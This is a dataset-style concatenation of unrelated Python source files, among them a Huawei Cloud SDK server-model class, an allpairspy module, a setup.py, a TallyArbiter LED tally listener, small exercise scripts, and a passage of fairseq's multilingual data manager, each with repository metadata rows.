"""Sets the count of this PrePaidServer.
创建云服务器数量。 约束: - 不传该字段时默认取值为1。 - 租户的配额足够时,最大值为500。
:param count: The count of this PrePaidServer.
:type: int
"""
self._count = count
@property
def is_auto_rename(self):
"""Gets the is_auto_rename of this PrePaidServer.
当批量创建弹性云服务器时,云服务器名称是否允许重名,当count大于1的时候该参数生效。默认为True。 - True,表示允许重名。 - False,表示不允许重名。
:return: The is_auto_rename of this PrePaidServer.
:rtype: bool
"""
return self._is_auto_rename
@is_auto_rename.setter
def is_auto_rename(self, is_auto_rename):
"""Sets the is_auto_rename of this PrePaidServer.
当批量创建弹性云服务器时,云服务器名称是否允许重名,当count大于1的时候该参数生效。默认为True。 - True,表示允许重名。 - False,表示不允许重名。
:param is_auto_rename: The is_auto_rename of this PrePaidServer.
:type: bool
"""
self._is_auto_rename = is_auto_rename
@property
def root_volume(self):
"""Gets the root_volume of this PrePaidServer.
:return: The root_volume of this PrePaidServer.
:rtype: PrePaidServerRootVolume
"""
return self._root_volume
@root_volume.setter
def root_volume(self, root_volume):
"""Sets the root_volume of this PrePaidServer.
:param root_volume: The root_volume of this PrePaidServer.
:type: PrePaidServerRootVolume
"""
self._root_volume = root_volume
@property
def data_volumes(self):
"""Gets the data_volumes of this PrePaidServer.
云服务器对应数据盘相关配置。每一个数据结构代表一块待创建的数据盘。 约束:目前新创建的弹性云服务器最多可挂载23块数据盘。
:return: The data_volumes of this PrePaidServer.
:rtype: list[PrePaidServerDataVolume]
"""
return self._data_volumes
@data_volumes.setter
def data_volumes(self, data_volumes):
"""Sets the data_volumes of this PrePaidServer.
云服务器对应数据盘相关配置。每一个数据结构代表一块待创建的数据盘。 约束:目前新创建的弹性云服务器最多可挂载23块数据盘。
:param data_volumes: The data_volumes of this PrePaidServer.
:type: list[PrePaidServerDataVolume]
"""
self._data_volumes = data_volumes
@property
def security_groups(self):
"""Gets the security_groups of this PrePaidServer.
云服务器对应安全组信息。 约束:当该值指定为空时,默认给云服务器绑定default安全组。
:return: The security_groups of this PrePaidServer.
:rtype: list[PrePaidServerSecurityGroup]
"""
return self._security_groups
@security_groups.setter
def security_groups(self, security_groups):
"""Sets the security_groups of this PrePaidServer.
云服务器对应安全组信息。 约束:当该值指定为空时,默认给云服务器绑定default安全组。
:param security_groups: The security_groups of this PrePaidServer.
:type: list[PrePaidServerSecurityGroup]
"""
self._security_groups = security_groups
@property
def availability_zone(self):
"""Gets the availability_zone of this PrePaidServer.
待创建云服务器所在的可用分区,需要指定可用分区(AZ)的名称。 请参考[地区和终端节点](https://developer.huaweicloud.com/endpoint)获取。
:return: The availability_zone of this PrePaidServer.
:rtype: str
"""
return self._availability_zone
@availability_zone.setter
def availability_zone(self, availability_zone):
"""Sets the availability_zone of this PrePaidServer.
待创建云服务器所在的可用分区,需要指定可用分区(AZ)的名称。 请参考[地区和终端节点](https://developer.huaweicloud.com/endpoint)获取。
:param availability_zone: The availability_zone of this PrePaidServer.
:type: str
"""
self._availability_zone = availability_zone
@property
def extendparam(self):
"""Gets the extendparam of this PrePaidServer.
:return: The extendparam of this PrePaidServer.
:rtype: PrePaidServerExtendParam
"""
return self._extendparam
@extendparam.setter
def extendparam(self, extendparam):
"""Sets the extendparam of this PrePaidServer.
:param extendparam: The extendparam of this PrePaidServer.
:type: PrePaidServerExtendParam
"""
self._extendparam = extendparam
@property
def metadata(self):
"""Gets the metadata of this PrePaidServer.
用户自定义字段键值对。 > 说明: > > - 最多可注入10对键值(Key/Value)。 > - 主键(Key)只能由大写字母(A-Z)、小写字母(a-z)、数字(0-9)、中划线(-)、下划线(_)、冒号(:)和小数点(.)组成,长度为[1-255]个字符。 > - 值(value)最大长度为255个字符。 系统预留字段 1. op_svc_userid : 用户ID 当extendparam结构中的chargingMode为prePaid(即创建包年包月付费的云服务器),且使用SSH秘钥方式登录云服务器时,该字段为必选字段。 2. agency_name : 委托的名称 委托是由租户管理员在统一身份认证服务(Identity and Access Management,IAM)上创建的,可以为弹性云服务器提供访问云服务的临时凭证。 > 说明: > > 委托获取、更新请参考如下步骤: > > 1. 使用IAM服务提供的[查询委托列表](https://support.huaweicloud.com/api-iam/zh-cn_topic_0079467614.html)接口,获取有效可用的委托名称。 > 2. 使用[更新云服务器元数](https://support.huaweicloud.com/api-ecs/zh-cn_topic_0025560298.html)据接口,更新metadata中agency_name字段为新的委托名称。
:return: The metadata of this PrePaidServer.
:rtype: dict(str, str)
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""Sets the metadata of this PrePaidServer.
用户自定义字段键值对。 > 说明: > > - 最多可注入10对键值(Key/Value)。 > - 主键(Key)只能由大写字母(A-Z)、小写字母(a-z)、数字(0-9)、中划线(-)、下划线(_)、冒号(:)和小数点(.)组成,长度为[1-255]个字符。 > - 值(value)最大长度为255个字符。 系统预留字段 1. op_svc_userid : 用户ID 当extendparam结构中的chargingMode为prePaid(即创建包年包月付费的云服务器),且使用SSH秘钥方式登录云服务器时,该字段为必选字段。 2. agency_name : 委托的名称 委托是由租户管理员在统一身份认证服务(Identity and Access Management,IAM)上创建的,可以为弹性云服务器提供访问云服务的临时凭证。 > 说明: > > 委托获取、更新请参考如下步骤: > > 1. 使用IAM服务提供的[查询委托列表](https://support.huaweicloud.com/api-iam/zh-cn_topic_0079467614.html)接口,获取有效可用的委托名称。 > 2. 使用[更新云服务器元数](https://support.huaweicloud.com/api-ecs/zh-cn_topic_0025560298.html)据接口,更新metadata中agency_name字段为新的委托名称。
:param metadata: The metadata of this PrePaidServer.
:type: dict(str, str)
"""
self._metadata = metadata
@property
def osscheduler_hints(self):
"""Gets the osscheduler_hints of this PrePaidServer.
:return: The osscheduler_hints of this PrePaidServer.
:rtype: PrePaidServerSchedulerHints
"""
return self._osscheduler_hints
@osscheduler_hints.setter
def osscheduler_hints(self, osscheduler_hints):
"""Sets the osscheduler_hints of this PrePaidServer.
:param osscheduler_hints: The osscheduler_hints of this PrePaidServer.
:type: PrePaidServerSchedulerHints
"""
self._osscheduler_hints = osscheduler_hints
@property
def tags(self):
"""Gets the tags of this PrePaidServer.
弹性云服务器的标签。 标签的格式为“key.value”。其中,key的长度不超过36个字符,value的长度不超过43个字符。 标签命名时,需满足如下要求: - 标签的key值只能包含大写字母(A~Z)、小写字母(a~z)、数字(0-9)、下划线(_)、中划线(-)以及中文字符。 - 标签的value值只能包含大写字母(A~Z)、小写字母(a~z)、数字(0-9)、下划线(_)、中划线(-)、小数点(.)以及中文字符。 > 说明: > > 创建弹性云服务器时,一台弹性云服务器最多可以添加10个标签。 > 公有云新增server_tags字段,该字段与tags字段功能相同,支持的key、value取值范围更广,建议使用server_tags字段。
:return: The tags of this PrePaidServer.
:rtype: list[str]
"""
return self._tags
@tags.setter
def tags(self, tags):
"""Sets the tags of this PrePaidServer.
弹性云服务器的标签。 标签的格式为“key.value”。其中,key的长度不超过36个字符,value的长度不超过43个字符。 标签命名时,需满足如下要求: - 标签的key值只能包含大写字母(A~Z)、小写字母(a~z)、数字(0-9)、下划线(_)、中划线(-)以及中文字符。 - 标签的value值只能包含大写字母(A~Z)、小写字母(a~z)、数字(0-9)、下划线(_)、中划线(-)、小数点(.)以及中文字符。 > 说明: > > 创建弹性云服务器时,一台弹性云服务器最多可以添加10个标签。 > 公有云新增server_tags字段,该字段与tags字段功能相同,支持的key、value取值范围更广,建议使用server_tags字段。
:param tags: The tags of this PrePaidServer.
:type: list[str]
"""
self._tags = tags
@property
def server_tags(self):
"""Gets the server_tags of this PrePaidServer.
弹性云服务器的标签。 > 说明: > > 创建弹性云服务器时,一台弹性云服务器最多可以添加10个标签。 > 公有云新增server_tags字段,该字段与tags字段功能相同,支持的key、value取值范围更广,建议使用server_tags字段。
:return: The server_tags of this PrePaidServer.
:rtype: list[PrePaidServerTag]
"""
return self._server_tags
@server_tags.setter
def server_tags(self, server_tags):
"""Sets the server_tags of this PrePaidServer.
弹性云服务器的标签。 > 说明: > > 创建弹性云服务器时,一台弹性云服务器最多可以添加10个标签。 > 公有云新增server_tags字段,该字段与tags字段功能相同,支持的key、value取值范围更广,建议使用server_tags字段。
:param server_tags: The server_tags of this PrePaidServer.
:type: list[PrePaidServerTag]
"""
self._server_tags = server_tags
@property
def description(self):
"""Gets the description of this PrePaidServer.
云服务器描述信息,默认为空字符串。 - 长度最多允许85个字符。 - 不能包含“<” 和 “>”。
:return: The description of this PrePaidServer.
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this PrePaidServer.
云服务器描述信息,默认为空字符串。 - 长度最多允许85个字符。 - 不能包含“<” 和 “>”。
:param description: The description of this PrePaidServer.
:type: str
"""
self._description = description
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, PrePaidServer):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 34.921569
| 659
| 0.640997
|
8de0329cabd5381847968b902106f09429be5fd6
| 1,715
|
py
|
Python
|
allpairspy/pairs_storage.py
|
pavelicii/allpairspy
|
bfba15ff92de53c5e96edde77be39228b785af83
|
[
"MIT"
] | 184
|
2017-05-08T01:06:58.000Z
|
2022-03-25T06:36:40.000Z
|
allpairspy/pairs_storage.py
|
zgq346712481/allpairspy
|
e15ac03234e41f420a90767763f4cc0ae14d575e
|
[
"MIT"
] | 10
|
2017-07-04T15:19:54.000Z
|
2022-03-20T10:21:43.000Z
|
allpairspy/pairs_storage.py
|
zgq346712481/allpairspy
|
e15ac03234e41f420a90767763f4cc0ae14d575e
|
[
"MIT"
] | 37
|
2018-06-07T14:20:31.000Z
|
2022-03-12T01:38:30.000Z
|
from itertools import combinations
class Node:
@property
def id(self):
return self.__node_id
@property
def counter(self):
return self.__counter
def __init__(self, node_id):
self.__node_id = node_id
self.__counter = 0
self.in_ = set()
self.out = set()
def __str__(self):
return str(self.__dict__)
def inc_counter(self):
self.__counter += 1
key_cache = {}
def key(items):
if items in key_cache:
return key_cache[items]
key_value = tuple([x.id for x in items])
key_cache[items] = key_value
return key_value
class PairsStorage:
def __init__(self, n):
self.__n = n
self.__nodes = {}
self.__combs_arr = [set() for _i in range(n)]
def __len__(self):
return len(self.__combs_arr[-1])
def add_sequence(self, sequence):
for i in range(1, self.__n + 1):
for combination in combinations(sequence, i):
self.__add_combination(combination)
def get_node_info(self, item):
return self.__nodes.get(item.id, Node(item.id))
def get_combs(self):
return self.__combs_arr
def __add_combination(self, combination):
n = len(combination)
assert n > 0
self.__combs_arr[n - 1].add(key(combination))
if n == 1 and combination[0].id not in self.__nodes:
self.__nodes[combination[0].id] = Node(combination[0].id)
return
ids = [x.id for x in combination]
for i, id in enumerate(ids):
curr = self.__nodes[id]
curr.inc_counter()
curr.in_.update(ids[:i])
curr.out.update(ids[i + 1 :])
| 23.175676
| 69
| 0.587172
|
a1b8a52a7bdbb8c1f5b121abedceed4f8c6b3a5e
| 1,195
|
py
|
Python
|
setup.py
|
huashen218/pytorch-ialgebra
|
f498fb2c91c5a48204c66ad5e6dc118cbec69641
|
[
"MIT"
] | 2
|
2021-02-01T20:07:13.000Z
|
2021-02-10T17:15:45.000Z
|
setup.py
|
huashen218/pytorch-ialgebra
|
f498fb2c91c5a48204c66ad5e6dc118cbec69641
|
[
"MIT"
] | null | null | null |
setup.py
|
huashen218/pytorch-ialgebra
|
f498fb2c91c5a48204c66ad5e6dc118cbec69641
|
[
"MIT"
] | null | null | null |
"""A setuptools based setup module."""
from setuptools import setup, find_packages
from os import path
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='pytorch-ialgebra',
version=open('VERSION').readline(),
description='interactive interpretation for deep learning models',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
author='',
author_email='', # Optional
keywords='interactive interpretation for deep learning models',
packages=[
'ialgebra',
'ialgebra.interpreters',
'ialgebra.models',
'ialgebra.operations',
'ialgebra.utils',
],
python_requires='>=3.0.*',
install_requires=[
'argparse',
'argparse',
'httpserver',
'threding',
'webbrowser',
'os',
'sys',
'pyyaml',
'numpy',
'tqdm',
'collections',
'cv2',
'torch',
'torchvision',
'matplotlib',
'visdom',
],
project_urls='https://pypi.org/project/pytorch-ialgebra/',
)
| 25.425532
| 71
| 0.593305
|
2f5ddb06afc557aacab032eacb19924df4aa74da
| 5,542
|
py
|
Python
|
tallyarbiter-ws281xlistener.py
|
5pm-HDH/TallyArbiter-WS28xxListener
|
6a6a5cd0718aa3add5b58299d9f95d1a99eb92ad
|
[
"MIT"
] | null | null | null |
tallyarbiter-ws281xlistener.py
|
5pm-HDH/TallyArbiter-WS28xxListener
|
6a6a5cd0718aa3add5b58299d9f95d1a99eb92ad
|
[
"MIT"
] | null | null | null |
tallyarbiter-ws281xlistener.py
|
5pm-HDH/TallyArbiter-WS28xxListener
|
6a6a5cd0718aa3add5b58299d9f95d1a99eb92ad
|
[
"MIT"
] | null | null | null |
## Tally Arbiter Python Listener
from signal import signal, SIGINT
from sys import exit
import sys
import time
from rpi_ws281x import PixelStrip, Color
import socketio
import json
device_states = []
bus_options = []
mode_preview = False
mode_program = False
if len(sys.argv) > 1:
configFileName = sys.argv[1]
else:
configFileName = 'config_ws281x.json'
server_config = {}
led_config = {}
# SocketIO Connections
sio = socketio.Client()
@sio.event
def connect():
print('Connected to Tally Arbiter server:', server_config["ip"], server_config["port"])
sio.emit('bus_options') # get current bus options
sio.emit('device_listen_blink', {'deviceId': led_config["deviceId"]}) # start listening for the device
repeatNumber = 2
while (repeatNumber):
repeatNumber = repeatNumber - 1
doBlink(0, 255, 0)
time.sleep(.3)
doBlink(0, 0, 0)
time.sleep(.3)
@sio.event
def connect_error(data):
print('Unable to connect to Tally Arbiter server:', server_config["ip"], server_config["port"])
doBlink(150, 150, 150)
time.sleep(.3)
doBlink(0, 0, 0)
time.sleep(.3)
@sio.event
def disconnect():
print('Disconnected from Tally Arbiter server:', server_config["ip"], server_config["port"])
doBlink(255, 255, 255)
time.sleep(.3)
doBlink(0, 0, 0)
time.sleep(.3)
@sio.event
def reconnect():
print('Reconnected to Tally Arbiter server:', server_config["ip"], server_config["port"])
repeatNumber = 2
while (repeatNumber):
repeatNumber = repeatNumber - 1
doBlink(0, 255, 0)
time.sleep(.3)
doBlink(0, 0, 0)
time.sleep(.3)
@sio.on('device_states')
def on_device_states(data):
global device_states
device_states = data
processTallyData()
@sio.on('bus_options')
def on_bus_options(data):
global bus_options
bus_options = data
@sio.on('flash')
def on_flash():
doBlink(255, 255, 255)
time.sleep(.5)
doBlink(0, 0, 0)
time.sleep(.5)
doBlink(255, 255, 255)
time.sleep(.5)
doBlink(0, 0, 0)
time.sleep(.5)
doBlink(255, 255, 255)
time.sleep(.5)
evaluateMode()
@sio.on('reassign')
def on_reassign(oldDeviceId, newDeviceId):
print('Reassigning from DeviceID: ' + oldDeviceId + ' to Device ID: ' + newDeviceId)
doBlink(0, 0, 0)
time.sleep(.1)
doBlink(0, 0, 255)
time.sleep(.1)
doBlink(0, 0, 0)
time.sleep(.1)
doBlink(0, 0, 255)
time.sleep(.1)
doBlink(0, 0, 0)
sio.emit('listener_reassign', data=(oldDeviceId, newDeviceId))
led_config["deviceId"] = newDeviceId
config_file = open(configFileName, 'w')
configJson = {}
configJson['server_config'] = server_config
configJson['led_config'] = led_config
config_file.write(json.dumps(configJson, indent=4))
config_file.close()
def getBusTypeById(busId):
for bus in bus_options:
if bus['id'] == busId:
return bus['type']
def processTallyData():
global mode_preview
global mode_program
for device_state in device_states:
if getBusTypeById(device_state['busId']) == 'preview':
if len(device_state['sources']) > 0:
mode_preview = True
else:
mode_preview = False
elif getBusTypeById(device_state['busId']) == 'program':
if len(device_state['sources']) > 0:
mode_program = True
else:
mode_program = False
evaluateMode()
def evaluateMode():
if (mode_preview == True) and (mode_program == False): # preview mode, color it green
doBlink(0, 255, 0)
elif (mode_preview == False) and (mode_program == True): # program mode, color it red
doBlink(255, 0, 0)
elif (mode_preview == True) and (mode_program == True): # preview+program mode, color it yellow
doBlink(255, 127, 0)
else: # no source, turn it off
doBlink(0, 0, 0)
def doBlink(r, g, b):
color = Color(r, g, b)
for i in range(strip.numPixels()):
strip.setPixelColor(i, color)
strip.show()
time.sleep(100.0 / 1000.0)
try:
config_file = open(configFileName)
config = config_file.read()
config_file.close()
if config != '':
configJson = json.loads(config)
server_config = configJson['server_config']
led_config = configJson['led_config']
else:
print('Config data could not be loaded.')
exit(0)
except IOError:
print('Config file could not be located.')
exit(0)
# Intialize the library (must be called once before other functions).
strip = PixelStrip(led_config["LED_COUNT"], led_config["LED_PIN"], led_config["LED_FREQ_HZ"], led_config["LED_DMA"],
led_config["LED_INVERT"], led_config["LED_BRIGHTNESS"], led_config["LED_CHANNEL"])
strip.begin()
while 1:
try:
sio.connect('http://' + server_config["ip"] + ':' + str(server_config["port"]))
sio.wait()
print('Tally Arbiter Listener Running. Press CTRL-C to exit.')
print(
'Attempting to connect to Tally Arbiter server: ' + server_config["ip"] + '(' + str(server_config["port"]) + ')')
except KeyboardInterrupt:
print('Exiting Tally Arbiter Listener.')
doBlink(0, 0, 0)
exit(0)
except socketio.exceptions.ConnectionError:
doBlink(0, 0, 0)
time.sleep(15)
except:
print("Unexpected error:", sys.exc_info()[0])
print('An error occurred internally.')
doBlink(0, 0, 0)
| 27.300493
| 125
| 0.628834
|
6a635aecb7c44bde0c9cd46f75fa322a4715d38c
| 741
|
py
|
Python
|
python/Basic-Algorith-Scripting/whereDoIBelong.py
|
stricoff92/freecodecamp-challenges
|
5f0012fc27edfe7d4855269e18c1b9bb82fe1f4a
|
[
"MIT"
] | null | null | null |
python/Basic-Algorith-Scripting/whereDoIBelong.py
|
stricoff92/freecodecamp-challenges
|
5f0012fc27edfe7d4855269e18c1b9bb82fe1f4a
|
[
"MIT"
] | 1
|
2018-09-28T01:34:46.000Z
|
2018-09-28T01:34:46.000Z
|
python/Basic-Algorith-Scripting/whereDoIBelong.py
|
stricoff92/freecodecamp-challenges
|
5f0012fc27edfe7d4855269e18c1b9bb82fe1f4a
|
[
"MIT"
] | null | null | null |
'''
Return the lowest index at which a value (second argument) should be inserted into an array (first argument) once it has been sorted.
The returned value should be a number.
For example, getIndexToIns([1,2,3,4], 1.5) should return 1 because it is greater than 1 (index 0), but less than 2 (index 1).
Likewise, getIndexToIns([20,3,5], 19) should return 2 because once the array has been sorted it will look like [3,5,20] and 19 is less than 20 (index 2) and greater than 5 (index 1).
'''
def getIndexToIns(arr, num):
# Count the number or arr elements that are less than num.
# That's the index where num would fit in an array sorted small to large.
return sum(v<num for v in arr)
getIndexToIns([40, 60], 50)
| 33.681818
| 182
| 0.707152
|
ea7f608ce9bf16bf51c10a9d7349923bb6cc9fe1
| 312
|
py
|
Python
|
ex035.py
|
Roninho514/Treinamento-Python
|
fc6ad0b64fb3dc3cfa5381f8fc53b5b3243a7ff6
|
[
"MIT"
] | null | null | null |
ex035.py
|
Roninho514/Treinamento-Python
|
fc6ad0b64fb3dc3cfa5381f8fc53b5b3243a7ff6
|
[
"MIT"
] | null | null | null |
ex035.py
|
Roninho514/Treinamento-Python
|
fc6ad0b64fb3dc3cfa5381f8fc53b5b3243a7ff6
|
[
"MIT"
] | null | null | null |
r1 = float(input('Digite o primeiro segmento:'))
r2 = float(input('Digite o segundo segmento:'))
r3 = float(input('Digite o terceiro segmento:'))
if r1 < r2 + r3 and r2 < r1+r3 and r3 < r1+r2:
print('Esses segmentos podem formar um triângulo')
else:
print('Esses segmentos não podem formar um triângulo')
| 44.571429
| 58
| 0.701923
|
0cee405d5798c41a7202eef2675d23b80c544f14
| 45,597
|
py
|
Python
|
fairseq/data/multilingual/multilingual_data_manager.py
|
ahmetustun/fairseq
|
5ec791d95476beaa1513da14efa9035337bf6a15
|
[
"MIT"
] | null | null | null |
fairseq/data/multilingual/multilingual_data_manager.py
|
ahmetustun/fairseq
|
5ec791d95476beaa1513da14efa9035337bf6a15
|
[
"MIT"
] | null | null | null |
fairseq/data/multilingual/multilingual_data_manager.py
|
ahmetustun/fairseq
|
5ec791d95476beaa1513da14efa9035337bf6a15
|
[
"MIT"
] | null | null | null |
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import itertools
import json
import logging
import math
import os
from collections import OrderedDict, defaultdict
from fairseq import utils
from fairseq.data import (
AppendTokenDataset,
ConcatDataset,
Dictionary,
LanguagePairDataset,
PrependTokenDataset,
SampledMultiDataset,
SampledMultiEpochDataset,
StripTokenDataset,
TransformEosLangPairDataset,
TruncateDataset,
data_utils,
indexed_dataset,
)
from fairseq.data.multilingual.multilingual_utils import (
EncoderLangtok,
LangTokSpec,
LangTokStyle,
augment_dictionary,
get_lang_tok,
)
from fairseq.data.multilingual.sampled_multi_dataset import CollateFormat
from fairseq.data.prefix_token_dataset import PrefixTokenDataset
from fairseq.file_io import PathManager
from fairseq.utils import FileContentsAction, csv_str_list, eval_str_dict
logger = logging.getLogger(__name__)
SRC_DICT_NAME = 'src'
TGT_DICT_NAME = 'tgt'
def _lang_id(dic: Dictionary, lang: str):
"""Return language ID index."""
idx = dic.index(lang)
assert idx != dic.unk_index, "cannot find language ID for lang {}".format(lang)
return idx
def load_sampling_weights(from_file):
with open(from_file) as f:
weights = json.load(f)
return weights
class MultilingualDatasetManager(object):
def __init__(self, args, lang_pairs, langs, dicts, sampling_method):
super().__init__()
self.args = args
self.seed = args.seed
self.lang_pairs = lang_pairs
self.extra_lang_pairs = (
list(
{p for _, v in args.extra_lang_pairs.items() for p in v.split(",")}
)
if args.extra_lang_pairs
else []
)
self.src_langs = {p.split("-")[0] for p in args.lang_pairs + self.extra_lang_pairs}
self.tgt_langs = {p.split("-")[1] for p in args.lang_pairs + self.extra_lang_pairs}
self.langs = langs
self.dicts = dicts
self.lang_dict = self.create_lang_dictionary(self.langs)
self.sampling_method = sampling_method
self.sampling_scheduler = None
self._has_sharded_data = False
self._num_shards_dict = {}
self._training_data_sizes = defaultdict(lambda: {})
@classmethod
def setup_data_manager(cls, args, lang_pairs, langs, dicts, sampling_method):
return MultilingualDatasetManager(
args, lang_pairs, langs, dicts, sampling_method
)
@staticmethod
def add_args(parser):
parser.add_argument(
"data",
help="colon separated path to data directories list, \
will be iterated upon during epochs in round-robin manner",
action=FileContentsAction,
)
parser.add_argument(
"--langs",
default=None,
type=csv_str_list,
help="a list of languages comma sperated languages which can appear in lang-pairs; "
"note that the ordering determines language token IDs",
)
parser.add_argument(
"--lang-dict",
default=None,
type=str,
help="an external file which contains a list of "
"languages which can appear in lang-pairs; "
"note that the ordering determines language token IDs; "
"--langs and --lang-dict are two exclusive options",
)
parser.add_argument('--source-dict', default=None, type=str,
help='path to source dictionary; if specified it will override per language dictionary loading')
parser.add_argument('--target-dict', default=None, type=str,
help='path to target dictionary; if specified it will override per language dictionary loading')
parser.add_argument(
"--lang-tok-style",
default=LangTokStyle.multilingual.value,
type=str,
choices=[LangTokStyle.multilingual.value, LangTokStyle.mbart.value],
help="language token styles",
)
parser.add_argument(
"--load-alignments",
action="store_true",
help="load the binarized alignments",
)
parser.add_argument(
"--left-pad-source",
default="True",
type=str,
metavar="BOOL",
help="pad the source on the left",
)
parser.add_argument(
"--left-pad-target",
default="False",
type=str,
metavar="BOOL",
help="pad the target on the left",
)
parser.add_argument(
"--max-source-positions",
default=1024,
type=int,
metavar="N",
help="max number of tokens in the source sequence",
)
parser.add_argument(
"--max-target-positions",
default=1024,
type=int,
metavar="N",
help="max number of tokens in the target sequence",
)
parser.add_argument(
"--upsample-primary",
default=1,
type=int,
help="amount to upsample primary dataset",
)
parser.add_argument(
"--truncate-source",
action="store_true",
default=False,
help="truncate source to max-source-positions",
)
parser.add_argument(
"--encoder-langtok",
default=None,
type=str,
choices=[EncoderLangtok.src.value, EncoderLangtok.tgt.value],
metavar="SRCTGT",
help="prepend to the beginning of source sentence the source or target "
"language token. (src/tgt)",
)
parser.add_argument(
"--decoder-langtok",
action="store_true",
help="prepend to the beginning of target sentence the target language token",
)
parser.add_argument(
"--lang-tok-replacing-bos-eos", action="store_true", default=False
)
parser.add_argument(
"--enable-lang-ids",
default=False,
action="store_true",
help="whether to include language IDs in samples",
)
parser.add_argument(
"--enable-reservsed-directions-shared-datasets",
default=False,
action="store_true",
help="whether to allow datasets be used in reversed directions",
)
parser.add_argument(
"--extra-data",
help='a dictionary of data name to this path, \
e.g. {"mined", path_to_mined_data, "denoised": path_to_denoised_data}',
type=lambda uf: eval_str_dict(uf, type=str),
default=None,
)
parser.add_argument(
"--extra-lang-pairs",
help='a dictionary of data name to the language pairs they serve, \
e.g. {"mined": comma-separated-lang-pairs, "denoised": comma-separated-lang-pairs}',
type=lambda uf: eval_str_dict(uf, type=str),
default=None,
)
parser.add_argument(
"--fixed-dictionary",
help="Fixed dictionary to use with model path",
default=None,
type=str,
)
parser.add_argument(
"--langtoks-specs",
help='a list of comma separated data types that a set of language tokens to be specialized for, \
e.g. "main,dae,mined". There will be a set of language tokens added to the vocab to \
distinguish languages in different training data types. If not specified, default language \
tokens per languages will be added',
default=LangTokSpec.main.value,
type=csv_str_list,
)
parser.add_argument(
"--langtoks",
help='a dictionary of how to add language tokens, \
e.g. {"mined": (None, "tgt"), "mono_dae": ("src.dae", "tgt"), "main": \
("src", "tgt")}, or {"mined": ("src.mined", "tgt")}',
default=None,
type=lambda uf: eval_str_dict(uf, type=str),
)
parser.add_argument(
"--sampling-weights-from-file",
help='a file contain a python dictionary of how to sample data sets, \
e.g. { "main:en_XX-es_XX": 0.2, "mined:en_XX-pt_XX": 0.5, \
"mono_dae:es_XX-es_XX: 0.3, "main:en_xx-fr_XX": 0.8 }',
default=None,
type=str,
)
parser.add_argument(
"--sampling-weights",
help='a dictionary of how to sample data sets, \
e.g. { "main:en_XX-es_XX": 0.2, "mined:en_XX-pt_XX": 0.5, \
"mono_dae:es_XX-es_XX: 0.3, "main:en_xx-fr_XX": 0.8 }',
default=None,
type=lambda uf: eval_str_dict(uf, type=str),
)
parser.add_argument(
"--virtual-epoch-size",
default=None,
type=int,
help="virtual epoch size to speed up data loading",
)
parser.add_argument(
"--virtual-data-size",
default=None,
type=int,
help="virtual data size of the whole joint dataset to speed"
"up data loading and have specific dynamic sampling strategy interval",
)
@classmethod
def load_langs(cls, args, **kwargs):
if args.lang_dict and args.langs:
raise ValueError("--langs and --lang-dict can not both be specified")
if args.lang_dict is None and args.langs is None:
logger.warning(
"External language dictionary is not provided; "
"use lang-pairs to infer the set of supported languages. "
"The language ordering is not stable which might cause "
"misalignment in pretraining and finetuning."
)
# infer from lang_pairs as it is
langs = list(
{x for lang_pair in args.lang_pairs for x in lang_pair.split("-")}
)
langs = sorted(langs)
logger.info(f"inferred language list: {langs}")
elif args.lang_dict:
with open(
PathManager.get_local_path(args.lang_dict), "r", encoding="utf-8"
) as f:
langs = [lang.strip() for lang in f.readlines() if lang.strip()]
logger.info(
f"loaded language list from {args.lang_dict} as they are ordered in file"
)
elif args.langs:
langs = args.langs
logger.info(
f"parsed the language list as they are ordered in the option: {langs}"
)
return langs
def has_sharded_data(self, split):
return self._has_sharded_data and split == getattr(
self.args, "train_subset", None
)
def _shared_collater(self):
return not (self.args.extra_data and "mono_dae" in self.args.extra_data) and (
not self.args.lang_tok_replacing_bos_eos
)
def estimate_global_pass_epoch(self, epoch):
if self.args.virtual_epoch_size is None or self.args.virtual_data_size is None:
return None
# one epoch more for remaining data in each shard
virtual_epochs_per_shard = math.ceil(
self.args.virtual_data_size / self.args.virtual_epoch_size
)
# note that fairseq epoch / shard_epoch starts from 1
shard_epoch = (epoch - 1) // virtual_epochs_per_shard + 1
return shard_epoch
@classmethod
def prepare(cls, load_dictionary, args, **kargs):
args.left_pad_source = utils.eval_bool(args.left_pad_source)
args.left_pad_target = utils.eval_bool(args.left_pad_target)
if not hasattr(args, "shuffle_instance"):
args.shuffle_instance = False
if args.langtoks is None:
args.langtoks = {}
if "main" not in args.langtoks:
src_langtok_spec = args.encoder_langtok if args.encoder_langtok else None
tgt_langtok_spec = "tgt" if args.decoder_langtok else None
args.langtoks["main"] = (src_langtok_spec, tgt_langtok_spec)
def check_langs(langs, pairs):
messages = []
for src, tgt in pairs:
if src not in langs or tgt not in langs:
messages.append(
f"language pair {src}-{tgt} contains languages "
"that are not in the language dictionary"
)
if len(messages) > 0:
raise ValueError(" ".join(messages) + f"; langs: {langs}")
if args.lang_pairs is None:
raise ValueError(
"--lang-pairs is required. List all the language pairs in the training objective."
)
if isinstance(args.lang_pairs, str):
args.lang_pairs = args.lang_pairs.split(",")
if args.source_lang is not None or args.target_lang is not None:
training = False
else:
training = True
language_list = cls.load_langs(args, **kargs)
check_langs(
language_list,
(
[p.split("-") for p in args.lang_pairs]
if training
else [(args.source_lang, args.target_lang)]
),
)
def load_dictionary_and_postproc(path):
d = load_dictionary(path)
augment_dictionary(
dictionary=d,
language_list=language_list,
lang_tok_style=args.lang_tok_style,
langtoks_specs=args.langtoks_specs,
extra_data=args.extra_data,
)
return d
